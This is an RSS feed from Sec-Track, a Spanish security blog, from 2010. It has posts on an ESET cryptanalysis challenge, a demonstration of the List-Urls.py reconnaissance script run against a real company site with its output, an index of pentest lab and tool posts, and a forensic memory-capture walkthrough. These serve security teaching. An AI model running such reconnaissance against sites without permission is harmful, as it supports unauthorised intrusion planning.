<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec-Track</title>
	<atom:link href="http://www.sec-track.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sec-track.com</link>
	<description></description>
	<lastBuildDate>Mon, 08 Mar 2010 05:52:46 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Desafío 10 de ESET &#8211; Criptoanálisis</title>
		<link>http://www.sec-track.com/desafio-10-de-eset-criptoanalisis</link>
		<comments>http://www.sec-track.com/desafio-10-de-eset-criptoanalisis#comments</comments>
		<pubDate>Sat, 06 Mar 2010 19:29:26 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Cripto Análisis]]></category>
		<category><![CDATA[Criptoanálisis]]></category>
		<category><![CDATA[Criptografía]]></category>
		<category><![CDATA[Esteganografía.]]></category>
		<category><![CDATA[Estegoanálisis]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=484</guid>
		<description><![CDATA[Desafío número 10 publicado por Cristian F. Borghello en el Blog de ESET Lationoamérica.
Un cliente acaba de enviarnos un archivo comprimido con clave y nos dice que las pistas para encontrar dicha contraseña de 9 caracteres se encuentra oculto de alguna forma en este otro par de archivos (MD5: 159aa63c90c0a2692562d3414a39eaca).
Se debe determinar cual es la [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Desafío número 10 publicado por <a href="http://www.segu-info.com.ar/acerca.htm" target="_blank"><strong>Cristian F. Borghello</strong></a> en el <strong><a href="http://blogs.eset-la.com/laboratorio/2010/03/05/desafio-10-eset/" target="_blank">Blog de ESET Lationoamérica</a>.</strong></p>
<p style="text-align: justify;">Un cliente acaba de enviarnos un archivo comprimido con clave y nos dice que las pistas para encontrar dicha contraseña de 9 caracteres se encuentra oculto de alguna forma en <a href="http://blogs.eset-la.com/laboratorio/wp-content/uploads/2010/03/desafio-10.zip" target="_blank"><strong>este otro par de archivos</strong></a> (<strong>MD5: </strong>159aa63c90c0a2692562d3414a39eaca).</p>
<p>Se debe determinar cual es la contraseña buscada sin realizar ataques de fuerza bruta sobre ningún archivo y dejarla en los comentarios de este post. La primera persona en describir la forma de llevar a cabo el proceso para obtener dicha clave, se llevará una Licencia del Antivirus de ESET.</p>
<p style="text-align: justify;">Las ideas, comentarios y sugerencias para resolver este reto pueden ser tratadas en la <a href="http://www.sec-track.com/lista-de-discusion-comentarios-sugerencias-solucionarios-retos-etc-de-sec-track" target="_blank"><strong>lista de Sec-Track</strong></a> o por medio de los comentarios de nuestro Blog.</p>
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desafio-10-de-eset-criptoanalisis/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool: List-Urls.py &#8211; Identifica los enlaces de una página Web</title>
		<link>http://www.sec-track.com/tool-list-urls-py-identifica-los-enlaces-de-una-pagina-web</link>
		<comments>http://www.sec-track.com/tool-list-urls-py-identifica-los-enlaces-de-una-pagina-web#comments</comments>
		<pubDate>Wed, 03 Mar 2010 21:20:03 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Information Gathering]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=478</guid>
		<description><![CDATA[List-Urls.py es un script desarrollado en Python por muts [at] whitehat.co.il que nos permitirá extraer los enlaces de una determinada página web, con el objetivo de recolectar información sobre un sistema.
Aunque existen otras herramientas para este mismo objetivo ( y addons-firefox), este script puede ser  útil en algunos casos en que se necesite editar o [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://pastebin.com/EbB4micK" target="_blank"><strong>List-Urls.py</strong></a> es un script desarrollado en Python por muts [at] whitehat.co.il que nos permitirá extraer los enlaces de una determinada página web, con el objetivo de recolectar información sobre un sistema.</p>
<p style="text-align: justify;"><span id="more-478"></span>Aunque existen otras herramientas para este mismo objetivo ( y addons-firefox), este script puede ser  útil en algunos casos en que se necesite editar o analizar en detalle los resultados obtenidos .</p>
<p style="text-align: justify;">Veamos:</p>
<p style="text-align: justify;">Descargamos <a href="http://pastebin.com/EbB4micK" target="_blank"><strong>List-Urls.py</strong></a> (ya incluída en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a>).</p>
<p style="text-align: justify;">Ejecutamos (puede utilizarse desde cualquier S.O que tenga Python, en este caso desde Windows):</p>
<p style="text-align: justify;"><strong>C:\Python26&gt;python.exe list-urls.py http://www.informatica64.com</strong></p>
<p style="text-align: justify;">Resultados:</p>
<p style="text-align: justify;">##########################################################<br />
#                                                       #<br />
#            Extract URLS from a web page               #<br />
#               muts@whitehat.co.il                     #<br />
#                                                       #<br />
##########################################################</p>
<p>/Default.aspx<br />
/formacion.aspx<br />
/consultoria.aspx<br />
/seguridad.aspx<br />
/herramientas.aspx<br />
/disenoSistemas.aspx#partner<br />
/libros.aspx</p>
<p>http://www.rootedcon.es/rooted-con-2010/rootedlabs.html</p>
<p>/libros.aspx<br />
#ctl00_Menu1_SkipLink<br />
Formacion.aspx<br />
seguridad.aspx<br />
Consultoria.aspx<br />
herramientas.aspx<br />
publicaciones.aspx<br />
contacta/contacta.aspx<br />
noticias.aspx<br />
MainHols.aspx<br />
dlinkacademy<br />
asegurait7<br />
ftsai.aspx<br />
VHandsOnLab.aspx<br />
uptosecure/<br />
Formacion.aspx<br />
EventosOnline.aspx<br />
calendariodetalle.aspx<br />
vclassrooms.aspx<br />
DocumentacionHols.aspx<br />
AplicacionesWeb.aspx<br />
AuditoriaInterna.aspx<br />
AnalisisForense.aspx<br />
DisenoSistemas.aspx<br />
ImplServidores.aspx<br />
Migraciones.aspx<br />
lopd.aspx<br />
sat<br />
foca</p>
<p>http://www.metashieldprotector.com</p>
<p>I64POP3Connector.aspx<br />
csppScanner.aspx<br />
herramientas.aspx<br />
herramientas.aspx<br />
webcasts.aspx<br />
blogs.aspx<br />
libros.aspx<br />
ManualesTecnicos.aspx<br />
RetosHacking.aspx<br />
technews.aspx<br />
ubicacion.aspx<br />
contacta/contacta.aspx<br />
trabaja.aspx<br />
javascript:__doPostBack(&#8216;ctl00$CalendarioEventos&#8217;,'V3684&#8242;)<br />
javascript:__doPostBack(&#8216;ctl00$CalendarioEventos&#8217;,'V3743&#8242;)<br />
Noticias.ashx<br />
/Noticias.aspx?id=46<br />
/Noticias.aspx?id=45<br />
/Noticias.aspx?id=44<br />
/Noticias.aspx?id=43</p>
<p>http://twitter.com/statuses/user_timeline/101166742.rss</p>
<p>http://twitter.com/Informatica64/statuses/9917561536</p>
<p>http://www.informatica64.com/certificado/Certificadoi64.zip</p>
<p>VHandsOnLab.aspx<br />
uptosecure<br />
dlinkacademy<br />
Eventos.ashx<br />
Detalle.aspx?id=0<br />
Detalle.aspx?id=1<br />
Detalle.aspx?id=2<br />
Detalle.aspx?id=3<br />
Detalle.aspx?id=4<br />
http://www.puntocompartido.com/BlogShare/Lists/Entradas de blog/ViewPost.aspx?ID<br />
=32</p>
<p>http://feedproxy.google.com/~r/ElLadoDelMal/~3/tdD9uAlmk_A/posteo-luego-existo.h</p>
<p>tml</p>
<p>http://feedproxy.google.com/~r/WindowsTecnico/~3/QQUcZrQHRBM/programador-de-tare</p>
<p>as-parte-i.aspx</p>
<p>http://feedproxy.google.com/~r/SegurosConForefront/~3/DEYi2sPZD_s/post.aspx</p>
<p>http://windowstips.wordpress.com/2010/02/23/owned-memorable/</p>
<p>http://el-blog-de-thor.blogspot.com/2010/02/regalo-de-la-rooted-con.html</p>
<p>http://feedproxy.google.com/~r/saenzguijarro/vhPW/~3/qzJ4FJ8fOVc/post.aspx</p>
<p>ubicacion.aspx</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-list-urls-py-identifica-los-enlaces-de-una-pagina-web/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Recopilación de publicaciones y entornos de Sec-Track</title>
		<link>http://www.sec-track.com/recopilacion-de-publicaciones-y-entornos-de-sec-track</link>
		<comments>http://www.sec-track.com/recopilacion-de-publicaciones-y-entornos-de-sec-track#comments</comments>
		<pubDate>Mon, 01 Mar 2010 21:09:28 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Sec-Track]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=470</guid>
		<description><![CDATA[Recopilación de las publicaciones en  Sec-Track:
Sobre Sec-Track



¿Qué es  Sec-Track?




Security Track


FAQ


Entornos de Entrenamiento



Objetivos Generales  para los  entornos De-Ice I, II, III y PwnOS


Video  tutorial de  configuración de los entornos De-Ice sobre GNU/Linux BackTrack


De-ICE PenTest LiveCDs (Nivel I)


Configuración De-ICE PenTest  LiveCDs (Nivel  I) en Qemu


Configuración De-ICE  PenTest LiveCDs [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: medium;"><span style="font-size: x-small;">Recopilación de las publicaciones en  Sec-Track:</span></span></p>
<p><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Sobre Sec-Track</strong></span><br />
</span></p>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to ¿Qué es Sec-Track?" rel="bookmark" href="../%c2%bfque-es-sec-track" target="_blank">¿Qué es  Sec-Track?</a></span></h2>
</li>
</ul>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Security Track" rel="bookmark" href="../security-track" target="_blank">Security Track</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to FAQ" rel="bookmark" href="../faq" target="_blank">FAQ</a></span></h2>
</li>
</ul>
<p><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Entornos de Entrenamiento</strong></span><br />
</span></p>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Objetivos Generales para los  entornos De-Ice I, II, III y PwnOS" rel="bookmark" href="../objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos" target="_blank">Objetivos Generales  para los  entornos De-Ice I, II, III y PwnOS</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Video tutorial de configuración  de los entornos De-Ice sobre GNU/Linux BackTrack" rel="bookmark" href="../video-tutorial-de-configuracion-de-los-entornos-de-ice-sobre-gnulinux-backtrack" target="_blank">Video  tutorial de  configuración de los entornos De-Ice sobre GNU/Linux BackTrack</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to De-ICE PenTest LiveCDs (Nivel  I)" rel="bookmark" href="../de-ice-pentest-livecds-nivel-i" target="_blank">De-ICE PenTest LiveCDs (Nivel I)</a></span></h2>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Configuración De-ICE PenTest  LiveCDs (Nivel I) en Qemu" rel="bookmark" href="../configuracion-de-ice-pentest-livecds-nivel-i-en-qemu" target="_blank">Configuración De-ICE PenTest  LiveCDs (Nivel  I) en Qemu</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Configuración De-ICE PenTest  LiveCDs (Nivel I) en VMWare" rel="bookmark" href="../configuracion-de-ice-pentest-livecds-nivel-i-en-vmware" target="_blank">Configuración De-ICE  PenTest LiveCDs (Nivel  I) en VMWare</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Video tutorial: Desarrollo del  Entorno De-Ice nivel I – Network Mapping, Port Scanning" rel="bookmark" href="../video-tutorial-desarrollo-del-entorno-de-ice-nivel-i-network-mapping-port-scanning" target="_blank">Video  tutorial:  Desarrollo del Entorno De-Ice nivel I – Network Mapping, Port Scanning</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel I – Recolección de Información / Enumeración de usuarios" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-recoleccion-de-informacion-enumeracion-de-usuarios" target="_blank">Desarrollo  del Entorno De-Ice nivel I – Recolección de Información / Enumeración  de usuarios</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel I – Escalada de Privilegios y Revelación de Información Crítica" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-escalada-de-privilegios-y-revelacion-de-informacion-critica" target="_blank">Desarrollo  del Entorno De-Ice nivel I – Escalada de Privilegios y Revelación de  Información Crítica</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel I – Backdoors, Manteniendo el Acceso" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso" target="_blank">Desarrollo  del Entorno  De-Ice nivel I – Backdoors, Manteniendo el Acceso</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel I – Conclusiones y Recomendaciones" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-conclusiones-y-recomendaciones" target="_blank">Desarrollo del  Entorno De-Ice  nivel I – Conclusiones y Recomendaciones</a></span></h2>
</li>
</ul>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to De-ICE PenTest LiveCDs (Nivel  II)" rel="bookmark" href="../de-ice-pentest-livecds-nivel-ii" target="_blank">De-ICE PenTest LiveCDs (Nivel II)</a></span></h2>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Configuración De-ICE PenTest  LiveCDs (Nivel II) en VMWare" rel="bookmark" href="../configuracion-de-ice-pentest-livecds-nivel-ii-en-vmware" target="_blank">Configuración De-ICE  PenTest LiveCDs  (Nivel II) en VMWare</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Configuración De-ICE PenTest  LiveCDs (Nivel II) en Qemu" rel="bookmark" href="../configuracion-de-ice-pentest-livecds-nivel-ii-en-qemu" target="_blank">Configuración De-ICE PenTest  LiveCDs (Nivel  II) en Qemu</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarollo del Entorno De-Ice II  – Network Mapping, Port Scanning" rel="bookmark" href="../desarollo-del-entorno-de-ice-ii-%e2%80%93-network-mapping-port-scanning" target="_blank">Desarollo del Entorno  De-Ice II –  Network Mapping, Port Scanning</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel II – Recolección de Información / Escaneo de Vulnerabilidades" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-recoleccion-de-informacion-escaneo-de-vulnerabilidades" target="_blank">Desarrollo  del Entorno De-Ice nivel II – Recolección de Información / Escaneo de  Vulnerabilidades</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel II – Acceso al Sistema y Elevación de Privilegios" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios" target="_blank">Desarrollo  del  Entorno De-Ice nivel II – Acceso al Sistema y Elevación de Privilegios</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Desarrollo del Entorno De-Ice  nivel II – Información Confidencial y Backdoors" rel="bookmark" href="../desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors" target="_blank">Desarrollo  del Entorno  De-Ice nivel II – Información Confidencial y Backdoors</a></span></h2>
</li>
</ul>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to De-ICE PenTest LiveCDs (Nivel  III)" rel="bookmark" href="../de-ice-pentest-livecds-nivel-iii" target="_blank">De-ICE PenTest LiveCDs (Nivel III)  Próximo a  realizar (Y)<br />
</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent  Link to PwnOS" rel="bookmark" href="../pwnos" target="_blank">PwnOS</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Reto de Análisis Forense  Digital de la Comunidad DragonJAR – Escenario e implementación" rel="bookmark" href="../reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-escenario-e-implementacion" target="_blank">Reto de  Análisis Forense Digital de la Comunidad DragonJAR – Escenario e  implementación</a></span></h2>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Reto de Análisis Forense  Digital de la Comunidad DragonJAR – Live Response: Recolección de Datos  Volátiles" rel="bookmark" href="../reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-live-response-recoleccion-de-datos-volatiles" target="_blank">Reto de Análisis Forense Digital de la  Comunidad DragonJAR –  Live Response: Recolección de Datos Volátiles</a></span></h2>
</li>
</ul>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Reto 1: Esteganografía by  HackPlayers" rel="bookmark" href="../reto-1-esteganografia-by-hackplayers" target="_blank">Reto 1: Esteganografía by HackPlayers</a></span></h2>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Solucionario del Reto 1 de  Esteganografía by HackPlayers and Juanma Merino" rel="bookmark" href="../solucionario-del-reto-1-de-esteganografia-by-hackplayers-and-juanma-merino" target="_blank">Solucionario  del Reto 1  de Esteganografía by HackPlayers and Juanma Merino</a></span></h2>
</li>
</ul>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Criptología + Criptograma I" rel="bookmark" href="../criptologia-criptograma-i" target="_blank">Criptología  + Criptograma I</a></span></h2>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Solución al Criptograma I por  Servant" rel="bookmark" href="../solucion-al-criptograma-i" target="_blank">Solución al Criptograma I por Servant</a></span></h2>
</li>
</ul>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Nuevo Reto de HackPlayers:  Llega el Carnaval" rel="bookmark" href="../nuevo-reto-de-hackplayers-llega-el-carnaval" target="_blank">Nuevo Reto de HackPlayers: Llega el  Carnaval</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Criptología + Introducción al  Criptoanálisis I" rel="bookmark" href="../criptologia-introduccion-al-criptoanalisis-i" target="_blank">Criptología + Introducción al  Criptoanálisis I</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Serie de Criptogramas Clásicos" rel="bookmark" href="../serie-de-criptogramas-clasicos" target="_blank">Serie  de Criptogramas Clásicos</a></span></h2>
</li>
</ul>
<p><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Metodologías  / Frameworks / Docs</strong></span><br />
</span></p>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to OSSTMM – Open Source Security  Testing Methodology Manual" rel="bookmark" href="../osstmm-open-source-security-testing-methodology-manual" target="_blank">OSSTMM – Open Source  Security Testing  Methodology Manual</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to ISSAF – Information System  Security Assessment Framework" rel="bookmark" href="../issaf-information-system-security-assessment-framework" target="_blank">ISSAF – Information  System Security  Assessment Framework</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Penetration Testing Framework" rel="bookmark" href="../penetration-testing-framework" target="_blank">Penetration  Testing Framework</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Metodología: NIST SP 800-42" rel="bookmark" href="../metodologia-nist-sp-800-42" target="_blank">Metodología:  NIST SP 800-42</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Comandos Esenciales en  GNU/Linux para Análisis Forense Digital" rel="bookmark" href="../comandos-esenciales-en-gnulinux-para-analisis-forense-digital" target="_blank">Comandos  Esenciales en  GNU/Linux para Análisis Forense Digital</a></span></h2>
</li>
</ul>
<p><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Tools</strong></span><br />
</span></p>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Colección de Add-ons Firefox  para Test de Penetración" rel="bookmark" href="../coleccion-de-add-ons-firefox-para-test-de-penetracion" target="_blank">Colección de Add-ons Firefox  para Test de  Penetración</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Nmap" rel="bookmark" href="../tool-nmap" target="_blank">Tool: Nmap</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Video tutorial: Identificación /  Conectividad de Sistemas con Nmap" rel="bookmark" href="../video-tutorial-identificacion-conectividad-de-sistemas-con-nmap" target="_blank">Video tutorial:  Identificación /  Conectividad de Sistemas con Nmap</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Recopilación de Diccionarios  para Auditorías a Contraseñas (Brute Force)" rel="bookmark" href="../recopilacion-de-diccionarios-para-auditorias-a-contrasenas-brute-force" target="_blank">Recopilación  de  Diccionarios para Auditorías a Contraseñas (Brute Force)</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Recopilación de Exploits desde  Offensive Security" rel="bookmark" href="../recopilacion-de-exploits-desde-offensive-security" target="_blank">Recopilación de Exploits desde  Offensive Security</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Plugin Firefox para búsqueda de  Exploits en la Base de Datos de Offensive Security" rel="bookmark" href="../plugin-firefox-para-busqueda-de-exploits-en-la-base-de-datos-de-offensive-security" target="_blank">Plugin  Firefox para  búsqueda de Exploits en la Base de Datos de Offensive Security</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Identificación de dominios  alojados en una misma IP/Hostname con Finddomains" rel="bookmark" href="../identificacion-de-dominios-alojados-en-una-misma-ip-hostname-con-finddomains" target="_blank">Identificación  de  dominios alojados en una misma IP/Hostname con Finddomains</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to NeXpose, Escaner de  Vulnerabilidades de Rapid7" rel="bookmark" href="../nexpose-escaner-de-vulnerabilidades-de-rapid7" target="_blank">NeXpose, Escaner de  Vulnerabilidades de  Rapid7</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Netstat" rel="bookmark" href="../tool-netstat" target="_blank">Tool: Netstat</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: UserAssist" rel="bookmark" href="../tool-userassist" target="_blank">Tool: UserAssist</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Hostmap, Host Name  Discovery Tool" rel="bookmark" href="../tool-hostmap-host-name-discovery-tool" target="_blank">Tool: Hostmap, Host Name Discovery Tool</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Nikto, Escaneo de  directorios y archivos sensibles en servidores Web" rel="bookmark" href="../tool-nikto-escaneo-de-directorios-y-archivos-sensible-en-servidores-web" target="_blank">Tool:  Nikto, Escaneo  de directorios y archivos sensibles en servidores Web</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Httprint, Web Server  Fingerprinting" rel="bookmark" href="../tool-httprint-web-server-fingerprinting" target="_blank">Tool: Httprint, Web Server  Fingerprinting</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Maltego, Herramienta de  Inteligencia, Análisis Forense y Recolección de Información" rel="bookmark" href="../tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion" target="_blank">Tool:  Maltego, Herramienta de Inteligencia, Análisis Forense y Recolección de  Información</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Subdomainer, Búsqueda de  subdominios de un dominio objetivo" rel="bookmark" href="../tool-subdomainer-busqueda-de-subdominios-de-un-dominio-objetivo" target="_blank">Tool: Subdomainer,  Búsqueda de  subdominios de un dominio objetivo</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: Geoedge, Ubicación  Geográfica de una IP / Hostname" rel="bookmark" href="../tool-geoedge-ubicacion-geografica-de-una-ip-hostname" target="_blank">Tool: Geoedge,  Ubicación Geográfica de  una IP / Hostname</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Tool: theHarvester, recolección  de correos electrónicos y nombres de usuarios" rel="bookmark" href="../tool-theharvester-recoleccion-de-correos-electronicos-y-nombres-de-usuarios" target="_blank">Tool:  theHarvester,  recolección de correos electrónicos y nombres de usuarios</a></span></h2>
</li>
</ul>
<p><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Videos / Audios</strong></span><br />
</span></p>
<ul>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Video Tutorial Netcat en  BackTrack" rel="bookmark" href="../video-tutorial-netcat-en-backtrack" target="_blank">Video Tutorial Netcat en BackTrack</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to Video tutorial: Introducción a  Nmap" rel="bookmark" href="../video-tutorial-introduccion-a-nmap" target="_blank">Video tutorial: Introducción a Nmap</a></span></h2>
</li>
<li>
<h2><span style="font-size: medium;"><a title="Permanent Link to PodCast by nonr00t" rel="bookmark" href="../podcast-by-nonr00t" target="_blank">PodCast by nonr00t</a></span></h2>
</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/recopilacion-de-publicaciones-y-entornos-de-sec-track/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Reto de Análisis Forense Digital de la Comunidad DragonJAR &#8211; Live Response: Recolección de Datos Volátiles</title>
		<link>http://www.sec-track.com/reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-live-response-recoleccion-de-datos-volatiles</link>
		<comments>http://www.sec-track.com/reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-live-response-recoleccion-de-datos-volatiles#comments</comments>
		<pubDate>Tue, 23 Feb 2010 08:43:45 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Análisis Forense Digital]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[FTK Imager]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Live Response]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=451</guid>
		<description><![CDATA[Continúa desde: Reto de  Análisis Forense Digital de la Comunidad DragonJAR – Escenario e  implementación
Vuelvo y repito que la intención de esta serie de post no es ofrecer el solucionario según los requerimientos exigidos por los desarrolladores del Reto. El objetivo de estos post es simplemente generar un espacio de discusión sobre los [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continúa desde: <strong><a title="Permanent Link to Reto de Análisis Forense  Digital de la Comunidad DragonJAR – Escenario e implementación" rel="bookmark" href="../reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-escenario-e-implementacion" target="_blank">Reto de  Análisis Forense Digital de la Comunidad DragonJAR – Escenario e  implementación</a></strong></p>
<p style="text-align: justify;">Vuelvo y repito que la intención de esta serie de post no es ofrecer el solucionario según los requerimientos exigidos por los desarrolladores del Reto. El objetivo de estos post es simplemente generar un espacio de discusión sobre los aportes que se realicen en pro de realizar de la mejor manera el análisis forense digital de dicho esceneario propuesto.</p>
<p style="text-align: justify;"><span id="more-451"></span>Por lo tanto vamos entonces a realizar la<strong> recolección de datos volátiles</strong><strong> y la preservación de la evidencia (Procesos más importantes en todo Análisis Forense Digital)<br />
</strong></p>
<p style="text-align: justify;">La idea es que yo proponga un método o técnica y los lectores sugieran otras o aprueben las aquí nombradas</p>
<p style="text-align: justify;">Como primera medida y según el<strong> <a href="http://www.sec-track.com/reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-escenario-e-implementacion" target="_blank">escenario propuesto</a></strong>, tenemos que meternos en el papel de analistas forenses, y que recién hemos llegado a la escena del crimen&#8230; En esta escena nos encontramos frente a un computador desde el cual se sospecha que se realizan actividades ilícitas relacionadas con ciber acoso y pedofília.</p>
<p style="text-align: justify;">Apagar o no apagar?&#8230; Por mi parte sugiero se realice un volcado de memoria, con el objetivo de recolectar información volátil y alojada en memoria, la cual nos permitirá obtener datos de alta importancia y que son altamente volátiles si no se realiza el proceso de volcado antes de reiniciar o apagar el equipo&#8230; Veamos:</p>
<p style="text-align: justify;">Conectaré un dispositivo de almacenamiento USB con el objetivo de ejecutar la herramienta <a href="http://www.accessdata.com/downloads.html" target="_blank"><strong>FTK Imager </strong></a>y realizar un volcado de memoria.</p>
<p style="text-align: justify;"><strong>Sistema en el momento que llegamos:</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img109.imageshack.us/img109/9674/83603039.jpg" alt="" width="794" height="591" /></p>
<p style="text-align: justify;"><strong>Conexión del dispositivo de almacenamiento por USB</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img109.imageshack.us/img109/8448/27635247.jpg" alt="" width="785" height="527" /></p>
